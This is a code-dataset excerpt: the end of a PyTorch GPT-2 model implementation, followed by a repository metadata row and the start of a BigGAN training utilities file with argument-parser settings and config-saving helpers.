Mask to avoid performing attention on padding token indices.
Mask values selected in ``[0, 1]``:
``1`` for tokens that are NOT MASKED, ``0`` for MASKED tokens.
**token_type_ids**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, sequence_length)``:
A parallel sequence of tokens (can be used to indicate various portions of the inputs).
The embeddings from these tokens will be summed with the respective token embeddings.
Indices are selected in the vocabulary (unlike BERT which has a specific vocabulary for segment indices).
**position_ids**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, sequence_length)``:
Indices of positions of each input sequence tokens in the position embeddings.
Selected in the range ``[0, config.max_position_embeddings - 1]``.
**head_mask**: (`optional`) ``torch.FloatTensor`` of shape ``(num_heads,)`` or ``(num_layers, num_heads)``:
Mask to nullify selected heads of the self-attention modules.
Mask values selected in ``[0, 1]``:
``1`` indicates the head is **not masked**, ``0`` indicates the head is **masked**.
**inputs_embeds**: (`optional`) ``torch.FloatTensor`` of shape ``(batch_size, sequence_length, embedding_dim)``:
Optionally, instead of passing ``input_ids`` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
"""
@add_start_docstrings(
"The bare GPT2 Model transformer outputting raw hidden-states without any specific head on top.",
GPT2_START_DOCSTRING,
GPT2_INPUTS_DOCSTRING,
)
class GPT2Model(GPT2PreTrainedModel):
r"""
Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
**last_hidden_state**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length, hidden_size)``
Sequence of hidden-states at the last layer of the model.
**past**:
list of ``torch.FloatTensor`` (one for each layer) of shape ``(2, batch_size, num_heads, sequence_length, embed_size_per_head)``:
that contains pre-computed hidden-states (key and values in the attention blocks).
Can be used (see `past` input) to speed up sequential decoding. The token ids which have their past given to this model
should not be passed as input ids as they have already been computed.
**hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
of shape ``(batch_size, sequence_length, hidden_size)``:
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
**attentions**: (`optional`, returned when ``config.output_attentions=True``)
list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.
Examples::
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
model = GPT2Model.from_pretrained('gpt2')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
outputs = model(input_ids)
last_hidden_states = outputs[0] # The last hidden-state is the first element of the output tuple
"""
def __init__(self, config):
super().__init__(config)
self.output_hidden_states = config.output_hidden_states
self.output_attentions = config.output_attentions
self.output_past = config.output_past
self.wte = nn.Embedding(config.vocab_size, config.n_embd)
self.wpe = nn.Embedding(config.n_positions, config.n_embd)
self.drop = nn.Dropout(config.embd_pdrop)
self.h = nn.ModuleList([Block(config.n_ctx, config, scale=True) for _ in range(config.n_layer)])
self.ln_f = nn.LayerNorm(config.n_embd, eps=config.layer_norm_epsilon)
self.init_weights()
def get_input_embeddings(self):
return self.wte
def set_input_embeddings(self, new_embeddings):
self.wte = new_embeddings
def _prune_heads(self, heads_to_prune):
""" Prunes heads of the model.
heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
"""
for layer, heads in heads_to_prune.items():
self.h[layer].attn.prune_heads(heads)
def forward(
self,
input_ids=None,
past=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
):
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
if token_type_ids is not None:
token_type_ids = token_type_ids.view(-1, input_shape[-1])
if position_ids is not None:
position_ids = position_ids.view(-1, input_shape[-1])
if past is None:
past_length = 0
past = [None] * len(self.h)
else:
past_length = past[0][0].size(-2)
if position_ids is None:
device = input_ids.device if input_ids is not None else inputs_embeds.device
position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1])
# Attention mask.
if attention_mask is not None:
attention_mask = attention_mask.view(-1, input_shape[-1])
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
attention_mask = attention_mask.to(dtype=next(self.parameters()).dtype) # fp16 compatibility
attention_mask = (1.0 - attention_mask) * -10000.0
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# head_mask has shape n_layer x batch x n_heads x N x N
if head_mask is not None:
if head_mask.dim() == 1:
head_mask = head_mask.unsqueeze(0).unsqueeze(0).unsqueeze(-1).unsqueeze(-1)
head_mask = head_mask.expand(self.config.n_layer, -1, -1, -1, -1)
elif head_mask.dim() == 2:
head_mask = (
head_mask.unsqueeze(1).unsqueeze(-1).unsqueeze(-1)
) # We can specify head_mask for each layer
head_mask = head_mask.to(
dtype=next(self.parameters()).dtype
) # switch to fload if need + fp16 compatibility
else:
head_mask = [None] * self.config.n_layer
if inputs_embeds is None:
inputs_embeds = self.wte(input_ids)
position_embeds = self.wpe(position_ids)
if token_type_ids is not None:
token_type_embeds = self.wte(token_type_ids)
else:
token_type_embeds = 0
hidden_states = inputs_embeds + position_embeds + token_type_embeds
hidden_states = self.drop(hidden_states)
output_shape = input_shape + (hidden_states.size(-1),)
presents = ()
all_attentions = []
all_hidden_states = ()
for i, (block, layer_past) in enumerate(zip(self.h, past)):
if self.output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states.view(*output_shape),)
outputs = block(
hidden_states, layer_past=layer_past, attention_mask=attention_mask, head_mask=head_mask[i]
)
hidden_states, present = outputs[:2]
if self.output_past:
presents = presents + (present,)
if self.output_attentions:
all_attentions.append(outputs[2])
hidden_states = self.ln_f(hidden_states)
hidden_states = hidden_states.view(*output_shape)
# Add last hidden state
if self.output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
outputs = (hidden_states,)
if self.output_past:
outputs = outputs + (presents,)
if self.output_hidden_states:
outputs = outputs + (all_hidden_states,)
if self.output_attentions:
# let the number of heads free (-1) so we can extract attention even after head pruning
attention_output_shape = input_shape[:-1] + (-1,) + all_attentions[0].shape[-2:]
all_attentions = tuple(t.view(*attention_output_shape) for t in all_attentions)
outputs = outputs + (all_attentions,)
return outputs # last hidden state, (presents), (all hidden_states), (attentions)
@add_start_docstrings(
"""The GPT2 Model transformer with a language modeling head on top
(linear layer with weights tied to the input embeddings). """,
GPT2_START_DOCSTRING,
GPT2_INPUTS_DOCSTRING,
)
class GPT2LMHeadModel(GPT2PreTrainedModel):
r"""
**labels**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, sequence_length)``:
Labels for language modeling.
Note that the labels **are shifted** inside the model, i.e. you can set ``lm_labels = input_ids``
Indices are selected in ``[-100, 0, ..., config.vocab_size]``
All labels set to ``-100`` are ignored (masked), the loss is only
computed for labels in ``[0, ..., config.vocab_size]``
Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
**loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
Language modeling loss.
**prediction_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length, config.vocab_size)``
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
**past**:
list of ``torch.FloatTensor`` (one for each layer) of shape ``(2, batch_size, num_heads, sequence_length, embed_size_per_head)``:
that contains pre-computed hidden-states (key and values in the attention blocks).
Can be used (see `past` input) to speed up sequential decoding. The token ids which have their past given to this model
should not be passed as input ids as they have already been computed.
**hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
of shape ``(batch_size, sequence_length, hidden_size)``:
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
**attentions**: (`optional`, returned when ``config.output_attentions=True``)
list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.
Examples::
import torch
from transformers import GPT2Tokenizer, GPT2LMHeadModel
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
model = GPT2LMHeadModel.from_pretrained('gpt2')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
outputs = model(input_ids, labels=input_ids)
loss, logits = outputs[:2]
"""
def __init__(self, config):
super().__init__(config)
self.transformer = GPT2Model(config)
self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False)
self.init_weights()
def get_output_embeddings(self):
return self.lm_head
def prepare_inputs_for_generation(self, input_ids, **kwargs):
# only last token for inputs_ids if past is defined in kwargs
if "past" in kwargs and kwargs["past"]:
input_ids = input_ids[:, -1].unsqueeze(-1)
inputs = {"input_ids": input_ids}
inputs.update(kwargs)
return inputs
def forward(
self,
input_ids=None,
past=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
):
transformer_outputs = self.transformer(
input_ids,
past=past,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
)
hidden_states = transformer_outputs[0]
lm_logits = self.lm_head(hidden_states)
outputs = (lm_logits,) + transformer_outputs[1:]
if labels is not None:
# Shift so that tokens < n predict n
shift_logits = lm_logits[..., :-1, :].contiguous()
# print('shift_logits {}'.format(shift_logits))
shift_labels = labels[..., 1:].contiguous()
# print('shift_labels {}'.format(shift_labels))
# Flatten the tokens
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
outputs = (loss,) + outputs
return outputs # (loss), lm_logits, presents, (all hidden_states), (attentions)
@add_start_docstrings(
"""The GPT2 Model transformer with a language modeling and a multiple-choice classification
head on top e.g. for RocStories/SWAG tasks. The two heads are two linear layers.
The language modeling head has its weights tied to the input embeddings,
the classification head takes as input the input of a specified classification token index in the input sequence).
""",
GPT2_START_DOCSTRING,
GPT2_INPUTS_DOCSTRING,
)
class GPT2DoubleHeadsModel(GPT2PreTrainedModel):
r"""
**mc_token_ids**: (`optional`, default to index of the last token of the input) ``torch.LongTensor`` of shape ``(batch_size, num_choices)``:
Index of the classification token in each input sequence.
Selected in the range ``[0, input_ids.size(-1) - 1[``.
**lm_labels**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, sequence_length)``:
Labels for language modeling.
Note that the labels **are shifted** inside the model, i.e. you can set ``lm_labels = input_ids``
Indices are selected in ``[-1, 0, ..., config.vocab_size]``
All labels set to ``-100`` are ignored (masked), the loss is only
computed for labels in ``[0, ..., config.vocab_size]``
**mc_labels**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size)``:
Labels for computing the multiple choice classification loss.
Indices should be in ``[0, ..., num_choices]`` where `num_choices` is the size of the second dimension
of the input tensors. (see `input_ids` above)
Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
**lm_loss**: (`optional`, returned when ``lm_labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
Language modeling loss.
**mc_loss**: (`optional`, returned when ``multiple_choice_labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
Multiple choice classification loss.
**lm_prediction_scores**: ``torch.FloatTensor`` of shape ``(batch_size, num_choices, sequence_length, config.vocab_size)``
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
**mc_prediction_scores**: ``torch.FloatTensor`` of shape ``(batch_size, num_choices)``
Prediction scores of the multiplechoice classification head (scores for each choice before SoftMax).
**past**:
list of ``torch.FloatTensor`` (one for each layer) of shape ``(2, batch_size, num_heads, sequence_length, embed_size_per_head)``:
that contains pre-computed hidden-states (key and values in the attention blocks).
Can be used (see `past` input) to speed up sequential decoding. The token ids which have their past given to this model
should not be passed as input ids as they have already been computed.
**hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
of shape ``(batch_size, sequence_length, hidden_size)``:
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
**attentions**: (`optional`, returned when ``config.output_attentions=True``)
list of ``torch.FloatTe로nsor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.
Examples::
import torch
from transformers import GPT2Tokenizer, GPT2DoubleHeadsModel
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
model = GPT2DoubleHeadsModel.from_pretrained('gpt2')
# Add a [CLS] to the vocabulary (we should train it also!)
tokenizer.add_special_tokens({'cls_token': '[CLS]'})
model.resize_token_embeddings(len(tokenizer)) # Update the model embeddings with the new vocabulary size
print(tokenizer.cls_token_id, len(tokenizer)) # The newly token the last token of the vocabulary
choices = ["Hello, my dog is cute [CLS]", "Hello, my cat is cute [CLS]"]
encoded_choices = [tokenizer.encode(s) for s in choices]
cls_token_location = [tokens.index(tokenizer.cls_token_id) for tokens in encoded_choices]
input_ids = torch.tensor(encoded_choices).unsqueeze(0) # Batch size: 1, number of choices: 2
mc_token_ids = torch.tensor([cls_token_location]) # Batch size: 1
outputs = model(input_ids, mc_token_ids=mc_token_ids)
lm_prediction_scores, mc_prediction_scores = outputs[:2]
"""
def __init__(self, config):
super().__init__(config)
config.num_labels = 1
self.transformer = GPT2Model(config)
self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False) #(n_embd, vocab_size)
self.multiple_choice_head = SequenceSummary(config)
self.init_weights()
def get_output_embeddings(self):
return self.lm_head
def forward(
self,
input_ids=None,
past=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
mc_token_ids=None,
lm_labels=None,
mc_labels=None,
):
transformer_outputs = self.transformer(
input_ids,
past=past,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
)
hidden_states = transformer_outputs[0]
lm_logits = self.lm_head(hidden_states) # Language Model Head
mc_logits = self.multiple_choice_head(hidden_states, mc_token_ids).squeeze(-1) # Multiple Classification Head
outputs = (lm_logits, mc_logits) + transformer_outputs[1:]
if mc_labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(mc_logits.view(-1, mc_logits.size(-1)), mc_labels.view(-1))
outputs = (loss,) + outputs
if lm_labels is not None:
shift_logits = lm_logits[..., :-1, :].contiguous()
shift_labels = lm_labels[..., 1:].contiguous()
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
outputs = (loss,) + outputs
return outputs # (lm loss), (mc loss), lm logits, mc logits, presents, (all hidden_states), (attentions)
| 46.826975
| 148
| 0.646999
|
794b2b4b5a82e5248f00f203dddc1d80fd4b8f1a
| 52,504
|
py
|
Python
|
utils.py
|
liuqk3/BigGAN-PyTorch
|
9b4491f5d68f34a1fe55bc0e8171fa3d3ad7bb08
|
[
"MIT"
] | null | null | null |
utils.py
|
liuqk3/BigGAN-PyTorch
|
9b4491f5d68f34a1fe55bc0e8171fa3d3ad7bb08
|
[
"MIT"
] | null | null | null |
utils.py
|
liuqk3/BigGAN-PyTorch
|
9b4491f5d68f34a1fe55bc0e8171fa3d3ad7bb08
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
''' Utilities file
This file contains utility functions for bookkeeping, logging, and data loading.
Methods which directly affect training should either go in layers, the model,
or train_fns.py.
'''
from __future__ import print_function
import sys
import os
import numpy as np
import time
import datetime
import json
import pickle
from argparse import ArgumentParser
import animal_hash
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
import datasets as dset
def prepare_parser():
usage = 'Parser for all scripts.'
parser = ArgumentParser(description=usage)
### Dataset/Dataloader stuff ###
parser.add_argument(
'--dataset', type=str, default='I128_hdf5',
help='Which Dataset to train on, out of I128, I256, C10, C100;'
'Append "_hdf5" to use the hdf5 version for ISLVRC '
'(default: %(default)s)')
parser.add_argument(
'--augment', action='store_true', default=False,
help='Augment with random crops and flips (default: %(default)s)')
parser.add_argument(
'--num_workers', type=int, default=8,
help='Number of dataloader workers; consider using less for HDF5 '
'(default: %(default)s)')
parser.add_argument(
'--no_pin_memory', action='store_false', dest='pin_memory', default=True,
help='Pin data into memory through dataloader? (default: %(default)s)')
parser.add_argument(
'--shuffle', action='store_true', default=True,#TODOFalse,
help='Shuffle the data (strongly recommended)? (default: %(default)s)')
parser.add_argument(
'--load_in_mem', action='store_true', default=False,
help='Load all data into memory? (default: %(default)s)')
parser.add_argument(
'--use_multiepoch_sampler', action='store_true', default=True,#TODOFalse,
help='Use the multi-epoch sampler for dataloader? (default: %(default)s)')
### Model stuff ###
parser.add_argument(
'--model', type=str, default='BigGAN',
help='Name of the model module (default: %(default)s)')
parser.add_argument(
'--G_param', type=str, default='SN',
help='Parameterization style to use for G, spectral norm (SN) or SVD (SVD)'
' or None (default: %(default)s)')
parser.add_argument(
'--D_param', type=str, default='SN',
help='Parameterization style to use for D, spectral norm (SN) or SVD (SVD)'
' or None (default: %(default)s)')
parser.add_argument(
'--G_ch', type=int, default=96, #TODO 64,
help='Channel multiplier for G (default: %(default)s)')
parser.add_argument(
'--D_ch', type=int, default=96, #TODO64,
help='Channel multiplier for D (default: %(default)s)')
parser.add_argument(
'--G_depth', type=int, default=1,
help='Number of resblocks per stage in G? (default: %(default)s)')
parser.add_argument(
'--D_depth', type=int, default=1,
help='Number of resblocks per stage in D? (default: %(default)s)')
parser.add_argument(
'--D_thin', action='store_false', dest='D_wide', default=True,
help='Use the SN-GAN channel pattern for D? (default: %(default)s)')
parser.add_argument(
'--G_shared', action='store_true', default=True,#TODOFalse,
help='Use shared embeddings in G? (default: %(default)s)')
parser.add_argument(
'--shared_dim', type=int, default=128,#TODO0,
help='G''s shared embedding dimensionality; if 0, will be equal to dim_z. '
'(default: %(default)s)')
parser.add_argument(
'--dim_z', type=int, default=120,#TODO128,
help='Noise dimensionality: %(default)s)')
parser.add_argument(
'--z_var', type=float, default=1.0,
help='Noise variance: %(default)s)')
parser.add_argument(
'--hier', action='store_true', default=True,#TODOFalse,
help='Use hierarchical z in G? (default: %(default)s)')
parser.add_argument(
'--cross_replica', action='store_true', default=False,
help='Cross_replica batchnorm in G?(default: %(default)s)')
parser.add_argument(
'--mybn', action='store_true', default=False,
help='Use my batchnorm (which supports standing stats?) %(default)s)')
parser.add_argument(
'--G_nl', type=str, default='inplace_relu',#TODO'relu',
help='Activation function for G (default: %(default)s)')
parser.add_argument(
'--D_nl', type=str, default='inplace_relu',#TODO'relu',
help='Activation function for D (default: %(default)s)')
parser.add_argument(
'--G_attn', type=str, default='64',
help='What resolutions to use attention on for G (underscore separated) '
'(default: %(default)s)')
parser.add_argument(
'--D_attn', type=str, default='64',
help='What resolutions to use attention on for D (underscore separated) '
'(default: %(default)s)')
parser.add_argument(
'--norm_style', type=str, default='bn',
help='Normalizer style for G, one of bn [batchnorm], in [instancenorm], '
'ln [layernorm], gn [groupnorm] (default: %(default)s)')
### Model init stuff ###
parser.add_argument(
'--seed', type=int, default=0,
help='Random seed to use; affects both initialization and '
' dataloading. (default: %(default)s)')
parser.add_argument(
'--G_init', type=str, default='ortho',
help='Init style to use for G (default: %(default)s)')
parser.add_argument(
'--D_init', type=str, default='ortho',
help='Init style to use for D(default: %(default)s)')
parser.add_argument(
'--skip_init', action='store_true', default=True,#TODOFalse,
help='Skip initialization, ideal for testing when ortho init was used '
'(default: %(default)s)')
### Optimizer stuff ###
parser.add_argument(
'--G_lr', type=float, default=1e-4,#TODO5e-5,
help='Learning rate to use for Generator (default: %(default)s)')
parser.add_argument(
'--D_lr', type=float, default=4e-4,#TODO2e-4,
help='Learning rate to use for Discriminator (default: %(default)s)')
parser.add_argument(
'--G_B1', type=float, default=0.0,
help='Beta1 to use for Generator (default: %(default)s)')
parser.add_argument(
'--D_B1', type=float, default=0.0,
help='Beta1 to use for Discriminator (default: %(default)s)')
parser.add_argument(
'--G_B2', type=float, default=0.999,
help='Beta2 to use for Generator (default: %(default)s)')
parser.add_argument(
'--D_B2', type=float, default=0.999,
help='Beta2 to use for Discriminator (default: %(default)s)')
### Batch size, parallel, and precision stuff ###
parser.add_argument(
'--batch_size', type=int, default=256,#TODO64,
help='Default overall batchsize (default: %(default)s)')
parser.add_argument(
'--G_batch_size', type=int, default=512,#TODO0,
help='Batch size to use for G; if 0, same as D (default: %(default)s)')
parser.add_argument(
'--num_G_accumulations', type=int, default=8,#TODO1,
help='Number of passes to accumulate G''s gradients over '
'(default: %(default)s)')
parser.add_argument(
'--num_D_steps', type=int, default=1,#TODO2,
help='Number of D steps per G step (default: %(default)s)')
parser.add_argument(
'--num_D_accumulations', type=int, default=8,#TODO1,
help='Number of passes to accumulate D''s gradients over '
'(default: %(default)s)')
parser.add_argument(
'--split_D', action='store_true', default=False,
help='Run D twice rather than concatenating inputs? (default: %(default)s)')
parser.add_argument(
'--num_epochs', type=int, default=100,
help='Number of epochs to train for (default: %(default)s)')
parser.add_argument(
'--parallel', action='store_true', default=True, #TODOFalse,
help='Train with multiple GPUs (default: %(default)s)')
parser.add_argument(
'--G_fp16', action='store_true', default=False,
help='Train with half-precision in G? (default: %(default)s)')
parser.add_argument(
'--D_fp16', action='store_true', default=False,
help='Train with half-precision in D? (default: %(default)s)')
parser.add_argument(
'--D_mixed_precision', action='store_true', default=False,
help='Train with half-precision activations but fp32 params in D? '
'(default: %(default)s)')
parser.add_argument(
'--G_mixed_precision', action='store_true', default=False,
help='Train with half-precision activations but fp32 params in G? '
'(default: %(default)s)')
parser.add_argument(
'--accumulate_stats', action='store_true', default=False,
help='Accumulate "standing" batchnorm stats? (default: %(default)s)')
parser.add_argument(
'--num_standing_accumulations', type=int, default=16,
help='Number of forward passes to use in accumulating standing stats? '
'(default: %(default)s)')
### Bookkeping stuff ###
parser.add_argument(
'--G_eval_mode', action='store_true', default=True,#TODOFalse,
help='Run G in eval mode (running/standing stats?) at sample/test time? '
'(default: %(default)s)')
parser.add_argument(
'--save_every', type=int, default=1000,#TODO2000,
help='Save every X iterations (default: %(default)s)')
parser.add_argument(
'--num_save_copies', type=int, default=2,
help='How many copies to save (default: %(default)s)')
parser.add_argument(
'--num_best_copies', type=int, default=5,#TODO2,
help='How many previous best checkpoints to save (default: %(default)s)')
parser.add_argument(
'--which_best', type=str, default='IS',
help='Which metric to use to determine when to save new "best"'
'checkpoints, one of IS or FID (default: %(default)s)')
parser.add_argument(
'--no_fid', action='store_true', default=False,
help='Calculate IS only, not FID? (default: %(default)s)')
parser.add_argument(
'--test_every', type=int, default=2000,#TODO5000,
help='Test every X iterations (default: %(default)s)')
parser.add_argument(
'--num_inception_images', type=int, default=50000,
help='Number of samples to compute inception metrics with '
'(default: %(default)s)')
parser.add_argument(
'--hashname', action='store_true', default=False,
help='Use a hash of the experiment name instead of the full config '
'(default: %(default)s)')
parser.add_argument(
'--base_root', type=str, default='',
help='Default location to store all weights, samples, data, and logs '
' (default: %(default)s)')
parser.add_argument(
'--data_root', type=str, default='data',
help='Default location where data is stored (default: %(default)s)')
parser.add_argument(
'--weights_root', type=str, default='weights',
help='Default location to store weights (default: %(default)s)')
parser.add_argument(
'--logs_root', type=str, default='logs',
help='Default location to store logs (default: %(default)s)')
parser.add_argument(
'--samples_root', type=str, default='samples',
help='Default location to store samples (default: %(default)s)')
parser.add_argument(
'--pbar', type=str, default='mine',
help='Type of progressbar to use; one of "mine" or "tqdm" '
'(default: %(default)s)')
parser.add_argument(
'--name_suffix', type=str, default='',
help='Suffix for experiment name for loading weights for sampling '
'(consider "best0") (default: %(default)s)')
parser.add_argument(
'--experiment_name', type=str, default='',
help='Optionally override the automatic experiment naming with this arg. '
'(default: %(default)s)')
parser.add_argument(
'--config_from_name', action='store_true', default=False,
help='Use a hash of the experiment name instead of the full config '
'(default: %(default)s)')
### EMA Stuff ###
parser.add_argument(
'--ema', action='store_true', default=True,#TODOFalse,
help='Keep an ema of G''s weights? (default: %(default)s)')
parser.add_argument(
'--ema_decay', type=float, default=0.9999,
help='EMA decay rate (default: %(default)s)')
parser.add_argument(
'--use_ema', action='store_true', default=True,#TODOFalse,
help='Use the EMA parameters of G for evaluation? (default: %(default)s)')
parser.add_argument(
'--ema_start', type=int, default=20000,#TODO0,
help='When to start updating the EMA weights (default: %(default)s)')
### Numerical precision and SV stuff ###
parser.add_argument(
'--adam_eps', type=float, default=1e-6,#TODO1e-8,
help='epsilon value to use for Adam (default: %(default)s)')
parser.add_argument(
'--BN_eps', type=float, default=1e-5,
help='epsilon value to use for BatchNorm (default: %(default)s)')
parser.add_argument(
'--SN_eps', type=float, default=1e-6,#TODO1e-8,
help='epsilon value to use for Spectral Norm(default: %(default)s)')
parser.add_argument(
'--num_G_SVs', type=int, default=1,
help='Number of SVs to track in G (default: %(default)s)')
parser.add_argument(
'--num_D_SVs', type=int, default=1,
help='Number of SVs to track in D (default: %(default)s)')
parser.add_argument(
'--num_G_SV_itrs', type=int, default=1,
help='Number of SV itrs in G (default: %(default)s)')
parser.add_argument(
'--num_D_SV_itrs', type=int, default=1,
help='Number of SV itrs in D (default: %(default)s)')
### Ortho reg stuff ###
parser.add_argument(
'--G_ortho', type=float, default=0.0, # 1e-4 is default for BigGAN
help='Modified ortho reg coefficient in G(default: %(default)s)')
parser.add_argument(
'--D_ortho', type=float, default=0.0,
help='Modified ortho reg coefficient in D (default: %(default)s)')
parser.add_argument(
'--toggle_grads', action='store_true', default=True,
help='Toggle D and G''s "requires_grad" settings when not training them? '
' (default: %(default)s)')
### Which train function ###
parser.add_argument(
'--which_train_fn', type=str, default='GAN',
help='How2trainyourbois (default: %(default)s)')
### Resume training stuff
parser.add_argument(
'--load_weights', type=str, default='',
help='Suffix for which weights to load (e.g. best0, copy0) '
'(default: %(default)s)')
parser.add_argument(
'--resume', action='store_true', default=False,
help='Resume training? (default: %(default)s)')
### Log stuff ###
parser.add_argument(
'--logstyle', type=str, default='%3.3e',
help='What style to use when logging training metrics?'
'One of: %#.#f/ %#.#e (float/exp, text),'
'pickle (python pickle),'
'npz (numpy zip),'
'mat (MATLAB .mat file) (default: %(default)s)')
parser.add_argument(
'--log_G_spectra', action='store_true', default=False,
help='Log the top 3 singular values in each SN layer in G? '
'(default: %(default)s)')
parser.add_argument(
'--log_D_spectra', action='store_true', default=False,
help='Log the top 3 singular values in each SN layer in D? '
'(default: %(default)s)')
parser.add_argument(
'--sv_log_interval', type=int, default=10,
help='Iteration interval for logging singular values '
' (default: %(default)s)')
return parser
# Arguments for sample.py; not presently used in train.py
def add_sample_parser(parser):
parser.add_argument(
'--sample_npz', action='store_true', default=True,#TODOFalse,
help='Sample "sample_num_npz" images and save to npz? '
'(default: %(default)s)')
parser.add_argument(
'--sample_num_npz', type=int, default=50000,
help='Number of images to sample when sampling NPZs '
'(default: %(default)s)')
parser.add_argument(
'--sample_sheets', action='store_true', default=True,#TODOFalse,
help='Produce class-conditional sample sheets and stick them in '
'the samples root? (default: %(default)s)')
parser.add_argument(
'--sample_interps', action='store_true', default=True,#TODOFalse,
help='Produce interpolation sheets and stick them in '
'the samples root? (default: %(default)s)')
parser.add_argument(
'--sample_sheet_folder_num', type=int, default=-1,
help='Number to use for the folder for these sample sheets '
'(default: %(default)s)')
parser.add_argument(
'--sample_random', action='store_true', default=True,#TODOFalse,
help='Produce a single random sheet? (default: %(default)s)')
parser.add_argument(
'--sample_trunc_curves', type=str, default='0.05_0.05_1.0',#TODO'',
help='Get inception metrics with a range of variances?'
'To use this, specify a startpoint, step, and endpoint, e.g. '
'--sample_trunc_curves 0.2_0.1_1.0 for a startpoint of 0.2, '
'endpoint of 1.0, and stepsize of 1.0. Note that this is '
'not exactly identical to using tf.truncated_normal, but should '
'have approximately the same effect. (default: %(default)s)')
parser.add_argument(
'--sample_inception_metrics', action='store_true', default=True,#TODOFalse,
help='Calculate Inception metrics with sample.py? (default: %(default)s)')
return parser
def make_sure_dir(file_or_path, str_type='dir'):
if str_type == 'file':
file_or_path = os.path.dirname(os.path.abspath(file_or_path))
if not os.path.exists(file_or_path):
os.makedirs(file_or_path)
def save_config_to_json(config, filename):
'''
Save the dictyionary config to a json file in the fiven path
Args:
config: dict, to be saved
filename: str, the path to save
'''
assert filename.endswith('.json'), 'the filename for the saving of config should be end with .josn'
make_sure_dir(filename, str_type='file')
config_ = {}
for k in config:
if isinstance(config[k], (str, list, int, float, bool)):
config_[k] = config[k]
else:
config_[k] = str(config[k])
with open(filename, 'w') as f:
# f.write(json.dumps(config_))
json.dump(config_, f, indent=4)
print('Config file saved to {}'.format(filename))
# Convenience dicts
dset_dict = {'I32': dset.ImageFolder, 'I64': dset.ImageFolder,
'I128': dset.ImageFolder, 'I256': dset.ImageFolder,
